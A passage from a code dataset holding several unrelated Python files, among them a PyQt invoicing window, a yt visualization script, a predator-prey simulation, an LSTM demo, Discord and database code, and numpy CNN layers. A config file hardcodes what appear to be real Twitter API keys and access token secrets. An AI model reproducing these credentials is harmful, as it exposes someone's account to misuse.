QtWidgets.QMessageBox.Ok) \n else: \n numeroFactura = self.txtNumeroDocumento.text()\n pos = aFac.buscarFactura(numeroFactura)\n objFact = aFac.devolverFactura(pos)\n codigoCliente = self.txtCodigoCliente.text()\n pos = aCli.buscarCliente(codigoCliente)\n objCliente = aCli.devolverCliente(pos)\n objFact.imprimirDocumentoVenta(objCliente)\n aDetVent.imprimirDetalleVenta(numeroFactura, aPro)\n QtWidgets.QMessageBox.information(self, \"Imprimir Factura\", \"La factura se ha impreso correctamente...!!!\", QtWidgets.QMessageBox.Ok) \n self.close()\n except:\n QtWidgets.QMessageBox.information(self, \"Imprimir Factura\", \"No se ha realizado ninguna venta...!!!\", QtWidgets.QMessageBox.Ok) \n\n def agregar(self):\n try:\n if int(self.txtCantidad.text()) > int(self.txtStock.text()):\n QtWidgets.QMessageBox.information(self, \"Venta\", \"No se puede vender esa cantidad...!!!\", QtWidgets.QMessageBox.Ok)\n elif int(self.txtCantidad.text()) <= 0:\n QtWidgets.QMessageBox.information(self, \"Venta\", \"La cantidad ingresada es incorrecta...!!!\", QtWidgets.QMessageBox.Ok)\n else:\n lista.append((self.obtenerItem(), self.obtenerCodigo(), self.obtenerDescripcion(), self.obtenerPrecio(), self.obtenerCantidad(),self.obtenerPrecio()*self.obtenerCantidad()))\n self.actualizarStockActualTemporal(self.obtenerCodigo(),self.obtenerCantidad())\n self.mostrarDetalle() \n self.calcularPago()\n except:\n QtWidgets.QMessageBox.information(self, \"Agregar Detalle\", \"No se ha completado los detalles del producto...!!!\", QtWidgets.QMessageBox.Ok) \n self.item = self.item - 1\n\n def mostrarDetalle(self):\n self.tblDetalle.setRowCount(len(lista))\n self.tblDetalle.setColumnCount(6)\n self.tblDetalle.verticalHeader().setVisible(False)\n for i in range(len(lista)):\n self.tblDetalle.setItem(i, 0, QtWidgets.QTableWidgetItem(str(lista[i][0])))\n self.tblDetalle.setItem(i, 1, QtWidgets.QTableWidgetItem(str(lista[i][1])))\n self.tblDetalle.setItem(i, 2, QtWidgets.QTableWidgetItem(str(lista[i][2])))\n self.tblDetalle.setItem(i, 3, QtWidgets.QTableWidgetItem(str(lista[i][3])))\n self.tblDetalle.setItem(i, 4, QtWidgets.QTableWidgetItem(str(lista[i][4])))\n self.tblDetalle.setItem(i, 5, QtWidgets.QTableWidgetItem(str(lista[i][5])))\n self.limpiarControles()\n\n def limpiarControles(self):\n self.txtCodigoProducto.clear()\n self.txtDescripcion.clear()\n self.txtStock.clear()\n self.txtPrecio.clear()\n self.txtCantidad.clear()\n \n def limpiarControlesTotal(self):\n self.txtNumeroDocumento.clear()\n self.txtCodigoCliente.clear()\n self.txtNombres.clear()\n self.txtCodigoProducto.clear()\n self.txtDescripcion.clear()\n self.txtStock.clear()\n self.txtPrecio.clear()\n self.txtCantidad.clear()\n self.txtTotalPagar.clear()\n self.tblDetalle.clearContents()\n self.tblDetalle.setRowCount(0)\n\n def calcularPago(self):\n self.subtotal_pagar = 0\n for i in range(len(lista)):\n self.subTotal = lista[i][5]\n self.subtotal_pagar = self.subtotal_pagar + float(self.subTotal)\n self.igv = 0.18 * self.subtotal_pagar\n self.total_pagar = self.subtotal_pagar + self.igv \n self.txtSubTotal.setText(\"S/. \" + str(round(self.subtotal_pagar, 2)))\n self.txtIgv.setText(\"S/. \" + str(round(self.igv, 2)))\n self.txtTotalPagar.setText(\"S/. \" + str(round(self.total_pagar, 2)))\n\n def generarVenta(self):\n if self.tblDetalle.rowCount() == 0:\n QtWidgets.QMessageBox.information(self, \"Venta\", \"No se ha agregado ningún detalle...!!!\", QtWidgets.QMessageBox.Ok)\n else: \n objFact = Factura(self.obtenerNumeroDocumento(), self.obtenerFecha(), self.txtIgv.text(), self.txtTotalPagar.text(), self.txtCodigoCliente.text())\n numeroFactura = self.obtenerNumeroDocumento()\n if aFac.buscarFactura(numeroFactura) == -1:\n aFac.adicionaFactura(objFact)\n self.actualizarStock()\n self.guardarDetalleVenta()\n aFac.grabar()\n aPro.grabar()\n QtWidgets.QMessageBox.information(self, \"Venta\", \"Se realizó la venta correctamente...!!!\", QtWidgets.QMessageBox.Ok)\n lista.clear()\n else:\n QtWidgets.QMessageBox.information(self, \"Venta\", \"El número de factura ingesado ya existe...!!!\", QtWidgets.QMessageBox.Ok)\n\n def actualizarStock(self):\n for i in range(self.tblDetalle.rowCount()):\n codigoProducto = self.tblDetalle.item(i, 1).text()\n cantidad = int(self.tblDetalle.item(i, 4).text())\n pos = aPro.buscarProducto(codigoProducto)\n objProducto = aPro.devolverProducto(pos)\n stock_actual = int(objProducto.getStockActual()) - cantidad\n aPro.actualizarStock(stock_actual, codigoProducto)\n\n def guardarDetalleVenta(self):\n for i in range(len(lista)):\n objDetVent = DetalleVenta(self.obtenerNumeroDocumento(), lista[i][0], lista[i][1], lista[i][3], lista[i][4])\n aDetVent.adicionaDetalleVenta(objDetVent)\n aDetVent.grabar()\n\n def generarNumeroDocumento(self):\n numeroDocunento = aFac.nroSerie()\n if numeroDocunento == 0:\n self.txtNumeroDocumento.setText(\"000001\")\n else:\n self.incremento = numeroDocunento\n self.incremento = self.incremento + 1\n self.txtNumeroDocumento.setText(\"00000\" + str(self.incremento))\n\n def cerrarVentana(self):\n lista.clear()\n self.close()","sub_path":"Vista/ventanaVentas.py","file_name":"ventanaVentas.py","file_ext":"py","file_size_in_byte":10814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"132162653","text":"import yt\nfrom yt_velmodel_vis import seis_model as sm\nfrom yt_velmodel_vis import shapeplotter as sp\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\n\nfname='NWUS11-S_percent.nc'\nout_dir='./output'\nmodel=sm.netcdf(fname)\n\n# interpolate the cartesian (or load it if it exists)\nmx=50000\ndvs_n=os.path.join(out_dir,fname.split('.')[0]+'_dvs_interp_'+str(mx)+'.npy')\nif os.path.isfile(dvs_n):\n model.coordTransform('sphere2cart')\n print(\"Loading cartesian-interpolated data from file\")\n dvs = np.load(dvs_n)\nelse:\n model.interp2cartesian(fields=['dvs'],res=[10000,10000,10000], input_units='m',max_dist=mx)\n dvs=model.interp['data']['dvs']\n np.save(dvs_n,dvs)\ndata={}\ndata['dvs']=dvs\n\n# set some gaussians for the TF\nbnds=[-6,10.]\ntf = yt.ColorTransferFunction((bnds[0],bnds[1]))\n# [center location, peak width, (red, green, blue, alpha)]\nTF_gausians=[[-2,1,(1.,0.0,0.0,0.8)],\n [2,1,(0.,0.0,1.0,0.8)]]\nfor gau in TF_gausians:\n tf.add_gaussian(gau[0],gau[1],gau[2])\n\n# plot the TF with a histogram\nx = np.linspace(bnds[0],bnds[1],tf.nbins)\ny = tf.funcs[3].y\nw = np.append(x[1:]-x[:-1], x[-1]-x[-2])\ncolors = np.array([tf.funcs[0].y, tf.funcs[1].y, tf.funcs[2].y,\n tf.funcs[3].y]).T\nfig = plt.figure(figsize=[6, 3])\nax = fig.add_axes([0.2, 0.2, 0.75, 0.75])\nd_hist=ax.hist(data['dvs'][~np.isnan(dvs)].ravel(),bins=100,density=True,log=False)\nax.bar(x, tf.funcs[3].y, w, edgecolor=[0.0, 0.0, 0.0, 0.0],\n log=False, color=colors, bottom=[0])\nplt.savefig(os.path.join(out_dir,'shapeplotter_tf.png'))\n\n# load the data as a uniform grid, create the 3d scene\nsc_mult=1.0 # scale multiplier\nbbox = model.cart['bbox'] # list-like [[xmin,xmax],[ymin,ymax],[zmin,zmax]]\nprint(bbox)\nds = yt.load_uniform_grid(data,data['dvs'].shape,sc_mult,bbox=bbox,nprocs=1,\n periodicity=(True,True,True),unit_system=\"mks\")\n\nsc = yt.create_scene(ds,'dvs')\n\n# Draw the domain boundary\n\n# draw true boundary extents\nlat_rnge=[np.min(model.data.variables['latitude']),np.max(model.data.variables['latitude'])]\nlon_rnge=[np.min(model.data.variables['longitude']),np.max(model.data.variables['longitude'])]\nmin_dep=0.\nmax_dep=1200.\nR=6371.\nr_rnge=[(R-max_dep)*1000.,(R-min_dep)*1000.]\nChunk=sp.sphericalChunk(lat_rnge,lon_rnge,r_rnge)\nsc=Chunk.domainExtent(sc,RGBa=[1.,1.,1.,0.005],n_latlon=100,n_rad=50)\nsc=Chunk.latlonGrid(sc,RGBa=[1.,1.,1.,0.005])\nsc=Chunk.latlonGrid(sc,RGBa=[1.,1.,1.,0.001],radius=(R-410.)*1000.)\nsc=Chunk.latlonGrid(sc,RGBa=[1.,1.,1.,0.001],radius=(R-max_dep)*1000.)\nsc=Chunk.wholeSphereReference(sc,RGBa=[1.,1.,1.,0.001])\n\nYS_lat=np.array([44.429764])\nYS_lon=np.array([-110.584663])\nYS_rads=np.array([6371.*1e3])\nsc=sp.addShapeToScene(sc,YS_lat,YS_lon,YS_rads,'PointSource',[1.,1.,1.,0.005],6)\n\n\n# some camera settings\npos=sc.camera.position\nprint(pos)\nsc.camera.set_position(pos,north_vector=np.array([0.0, 0.0, 1.0]))\nsource = sc.sources['source_00']\nsource.tfh.set_log(False)\n\n\nres=sc.camera.get_resolution()\nres_factor=3\nnew_res=(res[0]*res_factor,res[1]*res_factor)\nsc.camera.set_resolution(new_res)\n# apply the TF and render it\nsource.set_transfer_function(tf)\nnm='shapeplotter.png'\nsc.save(os.path.join(out_dir,nm),sigma_clip=3)\n","sub_path":"scripts/initial_testScripts/shapeplotter_yttest.py","file_name":"shapeplotter_yttest.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"47977472","text":"# Exercise 3.3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Pretty plot settings\nimport seaborn as sns\nrc = {'lines.linewidth': 4, 'axes.labelsize': 25,\n 'axes.titlesize': 30, 'lines.markersize': 20,\n 'legend.fontsize': 16}\nsns.set(rc=rc)\n\n# Define functions for dr/dt and df/dt\n\ndef dr_dt(r, f, alpha=1, beta=0.2):\n \"\"\"Compute dr/dt, time derivative of rabbit population\"\"\"\n\n return alpha * r - beta * f * r\n\ndef df_dt(r, f, delta=0.3, gamma=0.8):\n \"\"\"Compute df/dt, time derivative of fox population\"\"\"\n\n return delta * f * r - gamma * f\n\n# Define time range to numerically integrate over\ndelta_t = 0.001\nt_range = np.arange(0, 60, delta_t)\n\n# Initialize arrays to store rabbit and fox populations\nr = np.zeros_like(t_range)\nf = np.zeros_like(t_range)\n\n# Set initial conditions (at time t=0)\nr[0] = 10 # rabbits\nf[0] = 1 # fox\n\n# Numerically integrate\nfor i in range(1, len(t_range)):\n delta_r = dr_dt(r[i-1], f[i-1]) * delta_t\n delta_f = df_dt(r[i-1], f[i-1]) * delta_t\n\n r[i] = r[i-1] + delta_r\n f[i] = f[i-1] + delta_f\n\n# Plot results\n_ = plt.plot(t_range, r, '.r')\n_ = plt.plot(t_range, f, '.b')\n\n# Axes and title\nplt.title('Lotka-Volterra Model')\nplt.xlabel('Time')\nplt.ylabel('# of animals')\n\n# Legend\nplt.legend(('Rabbits (prey)', 'Foxes (predator)'))\nplt.show()\n","sub_path":"e03-03.py","file_name":"e03-03.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"439506868","text":"import torch as t\nimport torchvision as tv\nimport torchvision.transforms as transforms\nimport torch.nn as nn\nimport torch.optim as optim\nimport argparse\nimport math\nimport csv\nimport numpy as np\nimport pandas as pd\nfrom PIL import Image\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nfrom torchsummary import summary\n\n'''\n1.通过输入sin值去预测cos\n'''\n\n# Hyper Parameters\nTIME_STEP = 10 # rnn time step\nINPUT_SIZE = 1 # rnn input size\nLR = 0.02 # learning rate\n\n\n\nclass MyRNN(nn.Module):\n def __init__(self, input_size, hidden_size, output_size):\n super(MyRNN, self).__init__()\n self.rnn = nn.LSTM(\n input_size = input_size,\n hidden_size = hidden_size,\n batch_first = True\n )\n self.out = nn.Linear(hidden_size, output_size)\n\n self.rnn_type = \"LSTM\"\n self._hidden_size = hidden_size\n self._layer = 1\n '''\n :param x: batch,seq_len,input_size: 1,10,1\n :param h_state: batch, h_size\n :return:\n 因为本函数做作的是的,输入con_y来模拟sin_y,所以每个input的prediction都要\n 作为损失的依据。\n '''\n def forward(self, x, h_state):\n #output: batch, seq_len,direction * h_size: 1,10,32\n #h_state[0]:batch,layer*direction, h_size : 1,1,32\n\n output,h_state = self.rnn(x, h_state)\n\n out = self.out(t.squeeze(output))\n return out,h_state\n\n def init_hidden(self, batch, requires_grad=True):\n weight = next(self.parameters())\n if self.rnn_type == 'LSTM':\n return (t.zeros((batch, self._layer, self._hidden_size), requires_grad=requires_grad),\n t.zeros((batch, self._layer, self._hidden_size), requires_grad=requires_grad))\n else:\n return t.zeros((batch, self._layer, self._hidden_size), requires_grad=requires_grad)\n\n\ndef repackage_hidden(h):\n if isinstance(h, t.Tensor):\n return h.detach()\n else:\n return tuple(repackage_hidden(v) for v in h)\n\n\nif __name__ == '__main__':\n input_size = 1\n hidden_size = 32\n output_size = 1\n\n rnn = MyRNN(input_size, hidden_size, output_size)\n optimizer = optim.Adam(rnn.parameters(), lr=LR)\n loss_func = nn.MSELoss()\n\n for item in rnn.parameters():\n print(item.shape)\n\n\n\n h_state = t.zeros(1,1,32)\n\n predict_list = []\n y_list = []\n steps_list = []\n\n h_state = rnn.init_hidden(1)\n\n for step in range(60):\n start, end = step * np.pi, (step + 1) * np.pi\n steps = np.linspace(start, end, TIME_STEP, dtype=np.float32)\n x_np = np.sin(steps)\n y_np = np.cos(steps)\n\n x = t.Tensor(t.from_numpy(x_np[np.newaxis, :, np.newaxis]))\n y = t.Tensor(t.from_numpy(y_np[np.newaxis, :, np.newaxis]))\n\n\n #x shape batch,seq_len,dim : 1,10,1\n h_state = repackage_hidden(h_state)\n predict, h_n = rnn(x, h_state)\n #h_state = repackage_hidden(h_state)\n loss = loss_func(predict, y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n steps_list.extend(steps.tolist())\n predict_list.extend(predict.data.numpy().flatten())\n y_list.extend(y_np.flatten())\n\n plt.plot(steps_list, y_list, 'r-')\n plt.plot(steps_list, predict_list, 'b-')\n plt.draw()\n plt.show()\n","sub_path":"com/study/dl/rnn/lstm_sin_cos.py","file_name":"lstm_sin_cos.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"397895230","text":"from sqlalchemy import Column, BigInteger, Integer, String,\\\n DateTime, ForeignKey, Table\nfrom models import Base\n\n\nwxusers = Table('wx_users', Base.metadata,\n Column('id', BigInteger, primary_key=True, comment='ID'),\n Column('openid', String(64), nullable=False, comment='OpenID'),\n Column('unionid', String(64), comment='UnionID'),\n Column('nickname', String(64), comment='昵称'),\n Column('name', String(32), comment='名称'),\n Column('sex', Integer, default=0, comment='性别'),\n Column('language', String(32), comment='语言'),\n Column('city', String(64), comment='城市'),\n Column('province', String(64), comment='省份'),\n Column('country', String(64), comment='国家'),\n Column('headimgurl', String(512), comment='头像'),\n Column('remark', String(512), comment='备注'),\n Column('phone', String(32), comment='电话'),\n Column('mobile', String(32), comment='手机'),\n Column('email', String(256), comment='E-Mail'),\n Column('tags', String(256), comment='标签'),\n Column('subscribe', Integer, default=0, comment='关注状态'),\n Column('subscribe_time', BigInteger, comment='关注时间'),\n Column('subscribe_scene', String(32), comment='关注场景'),\n Column('qr_scene', Integer, comment='OpenID'),\n Column('qr_scene_str', String(256), comment='OpenID'),\n # Column('group_id', None, ForeignKey(\n # 'wx_user_groups.id', ondelete=\"set null\")),\n Column('account_id', None, ForeignKey(\n 'wx_accounts.id', ondelete=\"set null\"), comment='微信公众号'),\n Column('created_date', DateTime,\n nullable=False, comment='创建时间'),\n Column('last_modifed', DateTime, comment='修改时间')\n )\n","sub_path":"plugins/weixin/models/wxuser.py","file_name":"wxuser.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"89243820","text":"from discord import Game\n\nfrom cogs.utils.custom_bot import CustomBot\n\n\nclass ConnectionEvent(object):\n\n def __init__(self, bot:CustomBot):\n self.bot = bot \n\n\n @property\n def event_log_channel(self):\n channel_id = self.bot.config['event_log_channel']\n channel = self.bot.get_channel(channel_id)\n return channel\n\n\n # async def on_connect(self):\n # await self.event_log_channel.send(\"`on_connect` called.\")\n\n\n # async def on_ready(self):\n # await self.event_log_channel.send(\"`on_ready` called.\")\n\n\n async def on_shard_ready(self, shard_id:int):\n await self.event_log_channel.send(f\"`on_shard_ready` called for shard ID `{shard_id}`.\")\n presence_text = self.bot.config['presence_text']\n game = Game(f\"{presence_text} (shard {shard_id})\")\n await self.bot.change_presence(activity=game, shard_id=shard_id)\n\n\ndef setup(bot:CustomBot):\n x = ConnectionEvent(bot)\n bot.add_cog(x)\n","sub_path":"cogs/connection_event.py","file_name":"connection_event.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"469687459","text":"from yolobel import enums\r\nimport cv2\r\ndef yolo_calculator(point1,point2,w,h,rectangle):\r\n centre = [0.5*(point1[1]+point2[1])/w, 0.5*(point1[0]+point2[0])/h]\r\n width, height = (rectangle[3]/w, rectangle[2]/h)\r\n yolo_result = (f'{centre[0]:.6f} {centre[1]:.6f} {width:.6f} {height:.6f}\\n')\r\n return yolo_result\r\n\r\ndef save_out(yolo_result,frame):\r\n\r\n cv2.imwrite(enums.out_directory +\"/{}{}.jpg\".format(enums.out_name,enums.out_count),frame)\r\n out_text = open(enums.out_directory+\"/{}{}.txt\".format(enums.out_name,enums.out_count), \"w\")\r\n out_text.write(yolo_result)\r\n out_text.close()\r\n if(enums.out_count == 0):\r\n classes_text = open(enums.out_directory+\"/classes.txt\", \"w\")\r\n classes_text.write(str(enums.out_name))\r\n classes_text.close()\r\n\r\n\r\n\r\n enums.out_count +=1\r\n\r\n","sub_path":"Yolobel/vidbox.py","file_name":"vidbox.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"281959415","text":"from werkzeug._compat import integer_types\nfrom werkzeug.exceptions import Aborter, HTTPException\n\n\nclass RateLimit(Exception):\n def __init__(self, response):\n self.response = response\n try:\n message = response.json()[\"message\"]\n except Exception:\n message = getattr(response, \"content\", response)\n super().__init__(message)\n\n\nclass Rollback(Exception):\n \"\"\"Raising to manually rollback current (nested) transaction.\n\n Raising a ``Rollback`` will always rollback the current most recent\n transaction. By default (not setting `propagate`), subtransaction-driven\n (`nested=False`) nested transaction will rollback and re-raise the same\n ``Rollback`` exception object, while savepoint-driven (`nested=True`)\n nested transaction will rollback and stop the exception from propagating.\n\n You can manually override the behavior by setting `propagate` to `True`\n (always re-raise) or `False` (always swallow the exception) on need.\n Caution, setting to `False` can be sometimes dangerous, because it may be\n misleading when the code runs successfully without any errors but code\n after `raise Rollback(propagate=False)` is never executed, and the data is\n not persisted at all, silently. It is the same situation to use\n `raise Rollback()` in a savepoint-driven nested transaction (root\n transaction is never affected, unless explicitly set `propagate` to\n `False`, the exception is always re-raised.)\n \"\"\"\n\n def __init__(self, propagate=None):\n self.propagate = propagate\n\n\nclass Ejecter(Aborter):\n def __call__(self, code, *args, **kwargs):\n if not args and not kwargs and not isinstance(code, integer_types):\n raise HTTPException(response=code)\n if code not in self.mapping:\n raise LookupError(\"no exception for %r\" % code)\n return self.mapping[code](*args, **kwargs)\n\n\ndef eject(status, *args, **kwargs):\n \"\"\"\n A version of werkzeug.exceptions.abort that puts the description\n in the response status code to help PyPI.\n \"\"\"\n ejection = _ejecter(status, *args, **kwargs)\n description = kwargs.get(\"description\")\n if description is not None:\n ejection.code = \"%s %s\" % (ejection.code, description)\n raise ejection\n\n\n_ejecter = Ejecter()\n","sub_path":"jazzband/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"121590136","text":"import os\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\nSQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'app.db')\nSQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')\n\n# Neo4j database address\nNEO4J_DB_ADDR = \"http://localhost:7474/db/data/\" \n\n#twitter feed parameters\nCONSUMER_KEY = 'gak4XDTmSROJ0Maa8DGDt8CJT'\nCONSUMER_SECRET = 'f4UVy2riwK3iu1Nzl7Jgfm3WfFe3GC1DkFF5Oxe5A0o0g57GL4'\nACCESS_TOKEN_KEY = '725519940-CHo44i7SuseSHiUkUGd8lLNbGs6o4VcmAwQo1cS5'\nACCESS_TOKEN_SECRET = 'uVwmTpMTbD3IRILhfsznXMoYdrjWLH0PpFKznLmVbUKWR'\n\n# locale as 'en_US'\nLOCALE_VALUE = 'en_US'","sub_path":"server/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"618613711","text":"from Constract.IPull import IPull\nimport asyncio\nfrom HcServices.Http import Http\nfrom Helper.System import System\nimport logging\nfrom Database.Db import Db\nimport Constant.Constant as const\n\n\nclass GroupingPullHandler(IPull):\n \n def __init__(self, log: logging.Logger, http: Http):\n super().__init__(log, http)\n \n async def PullAndSave(self):\n s = System(self._IPull__logger)\n data = await s.SendHttpRequestTotUrl(self._IPull__http, const.SERVER_HOST+const.CLOUD_PULL_GROUPING_URL, {})\n if data is not None:\n self.__saveToDb(data)\n self.PullSuccess()\n\n def __saveToDb(self, data: list):\n db = Db()\n db.Services.GroupingServices.AddManyGroupingWithCustomData(data)\n \n deviceIdForGroupDeviceMapping = []\n groupDeviceMappingArray = []\n \n for i in range(len(data)):\n groupingDeviceMappingsList = data[i].get(\"groupingDeviceMappings\", [])\n for j in range(len(groupingDeviceMappingsList)):\n deviceId = groupingDeviceMappingsList[j].get('deviceId')\n groupingObject = {\n \"GroupingId\": groupingDeviceMappingsList[j].get('groupingId'),\n \"GroupUnicastId\": data[j].get('unicastId'),\n \"DeviceId\": groupingDeviceMappingsList[j].get('deviceId'),\n \"DeviceUnicastId\": None\n }\n deviceIdForGroupDeviceMapping.append(deviceId)\n groupDeviceMappingArray.append(groupingObject)\n\n deviceRecords = db.Services.DeviceServices.FindAllDevice()\n deviceIdUnicastMapping = {}\n\n for deviceRecord in deviceRecords:\n deviceId = deviceRecord['DeviceId']\n deviceUnicastId = deviceRecord['DeviceUnicastId']\n deviceIdUnicastMapping[deviceId] = deviceUnicastId\n\n for i in range(len(deviceIdForGroupDeviceMapping)):\n deviceId = deviceIdForGroupDeviceMapping[i]\n groupDeviceMappingArray[i]['DeviceUnicastId'] = deviceIdUnicastMapping.get(deviceId)\n db.Services.GroupingDeviceMappingServices.AddManyGroupingDeviceMappingWithCustomData(groupDeviceMappingArray)\n","sub_path":"PullHandler/GroupingPullHandler.py","file_name":"GroupingPullHandler.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"281696464","text":"import os\nimport sys\n\nimport main\nimport main_iterative\nimport main_iterative_all_videos\n\nif __name__ == \"__main__\":\n video_path = \"\"\n if len(sys.argv) > 1:\n video_path = sys.argv[1]\n if not os.path.exists(video_path):\n print(\"Missing file video: video path is not correct\")\n exit(0)\n if len(sys.argv) == 2:\n main_iterative.run(video_path)\n else:\n # soglia di durata minima di una fissazione (frame)\n duration_threshold = int(sys.argv[2])\n # soglia di dispersione massima di una fissazione (pixel)\n dispersion_threshold = int(sys.argv[3])\n main.run(video_path, duration_threshold, dispersion_threshold)\n else:\n main_iterative_all_videos.run()\n\n\n\n","sub_path":"INMCA_Leporini.py","file_name":"INMCA_Leporini.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"502844178","text":"from libcloud.storage.types import Provider\nfrom libcloud.storage.providers import get_driver\n\nFILE_PATH = \"/home/user/myfile.tar.gz\"\n\ncls = get_driver(Provider.S3)\ndriver = cls(\"api key\", \"api secret key\")\n\ncontainer = driver.get_container(container_name=\"my-backups-12345\")\n\n# This method blocks until all the parts have been uploaded.\nextra = {\"content_type\": \"application/octet-stream\", \"acl\": \"public-read\"}\n\nwith open(FILE_PATH, \"rb\") as iterator:\n obj = driver.upload_object_via_stream(\n iterator=iterator, container=container, object_name=\"backup.tar.gz\", extra=extra\n )\n","sub_path":"docs/examples/storage/s3/upload_object_acls.py","file_name":"upload_object_acls.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"220018341","text":"#!/usr/bin/python3\n\nimport jnius_config\nimport sys\n\njnius_config.set_classpath('terra121_classes')\nfrom jnius import autoclass\n\nA = 6378137.0\nB = 6356752.3142\n\nModifiedAirocean = autoclass(\"io.github.terra121.projection.ModifiedAirocean\")\nScaleProjection = autoclass(\"io.github.terra121.projection.ScaleProjection\")\nGeographicProjection = autoclass(\"io.github.terra121.projection.GeographicProjection\")\nOrientation = autoclass(\"io.github.terra121.projection.GeographicProjection$Orientation\")\n\nbase_projection = GeographicProjection.orientProjection(ModifiedAirocean(), Orientation.none)\nprojection = ScaleProjection(base_projection, 7318261.522857145, -7318261.522857145)\n\nif __name__ == \"__main__\":\n# print(projection.fromGeo(0, 51.5))\n# print(projection.toGeo(*projection.fromGeo(0, 51.5)))\n\n# print(projection.fromGeo(47.58562, 6.89743))\n# print('Number of arguments:', len(sys.argv), 'arguments.')\n# print('Argument List:', str(sys.argv))\n\n# print('Argument List:', str(sys.argv[0]))\n print(projection.fromGeo( float(str(sys.argv[2])) , float(str(sys.argv[1]))) )","sub_path":"PACMAN_CUBERITE/project-obj/projection.py","file_name":"projection.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"311096503","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom layers import *\nfrom fast_layers import *\n\n\nconv_forward = conv_forward_fast\nconv_backward = conv_backward_fast\n\navg_pool_forward = avg_pool_forward_fast\navg_pool_backward = avg_pool_backward_fast\nmax_pool_forward = max_pool_forward_fast\nmax_pool_backward = max_pool_backward_fast\n\n\ndef spatial_reflection_padding(array, pad_width, pad_type='even'):\n '''https://twitter.com/karpathy/status/720622989289644033'''\n return np.pad(array, pad_width, 'reflect', pad_type)\n\n\ndef spatial_replication_padding(array, pad_width):\n '''https://twitter.com/karpathy/status/720622989289644033'''\n return np.pad(array, pad_width, 'edge')\n\n\ndef skip_forward(x, n_out_channels):\n '''\n Computes the forward pass for a skip connection.\n The input x has shape (N, d_1, d_2, d_3) where x[i] is the ith input.\n If n_out_channels is equal to 2* d_1, downsampling and padding are applied\n else, the input is replicated in output\n Inputs:\n x - Input data, of shape (N, d_1, d_2, d_3)\n n_out_channels - Number of channels in output\n Returns a tuple of:\n - skip: output, of shape (N, n_out_channels, d_2/2, d_3/2)\n - cache: (pool_cache, downsampled, skip_p)\n '''\n N, n_in_channels, H, W = x.shape\n assert (n_in_channels == n_out_channels) or (\n n_out_channels == n_in_channels*2), 'Invalid n_out_channels'\n skip = np.array(x, copy=True)\n pool_cache, downsampled, skip_p = None, False, 0\n\n if n_out_channels > n_in_channels:\n # downsampling\n pool_param = {'pool_width': 2, 'pool_height': 2, 'stride': 2}\n\n skip, pool_cache = avg_pool_forward(skip, pool_param)\n # padding\n p = skip_p = (n_in_channels)/2\n skip = np.pad(skip, ((0, 0), (p, p), (0, 0), (0, 0)),\n mode='constant')\n\n downsampled = True\n\n return skip, (pool_cache, downsampled, skip_p)\n\n\ndef skip_backward(dout, cache):\n '''\n Computes the backward pass for a skip connection.\n The input x has shape (N, d_1, d_2, d_3) where x[i] is the ith input.\n If n_out_channels was equal to 2* d_1, we back-apply downsampling and padding,\n else, the input is replicated in output\n Returns:\n - dskip: Gradient with respect to x, of shape (N, d1, ..., d_k)\n '''\n pool_cache, downsampled, skip_p = cache\n dskip = np.array(dout, copy=True)\n if downsampled:\n # back pad\n dskip = dskip[:, skip_p:-skip_p, :, :]\n # back downsampling\n\n dskip = avg_pool_backward(dskip, pool_cache)\n return dskip\n\n\ndef affine_relu_forward(x, w, b):\n '''\n Convenience layer that perorms an affine transform followed by a ReLU\n\n Inputs:\n - x: Input to the affine layer\n - w, b: Weights for the affine layer\n\n Returns a tuple of:\n - out: Output from the ReLU\n - cache: Object to give to the backward pass\n '''\n a, fc_cache = affine_forward(x, w, b)\n out, relu_cache = relu_forward(a)\n cache = (fc_cache, relu_cache)\n return out, cache\n\n\ndef affine_relu_backward(dout, cache):\n '''\n Backward pass for the affine-relu convenience layer\n '''\n fc_cache, relu_cache = cache\n da = relu_backward(dout, relu_cache)\n dx, dw, db = affine_backward(da, fc_cache)\n return dx, dw, db\n\n\ndef affine_bn_relu_forward(x, w, b, gamma, beta, bn_param):\n '''\n Convenience layer that performs an affine transform followed by batch\n normalization, followed by a ReLU.\n Inputs:\n - x: Input to the affine layer\n - w, b: Weights for the affine layer\n - gamma, beta : Weight for the batch norm regularization\n - bn_params : Contain variable use to batch norml, running_mean and var\n\n Returns a tuple of:\n - out: Output from the ReLU\n - cache: Object to give to the backward pass\n '''\n\n h, h_cache = affine_forward(x, w, 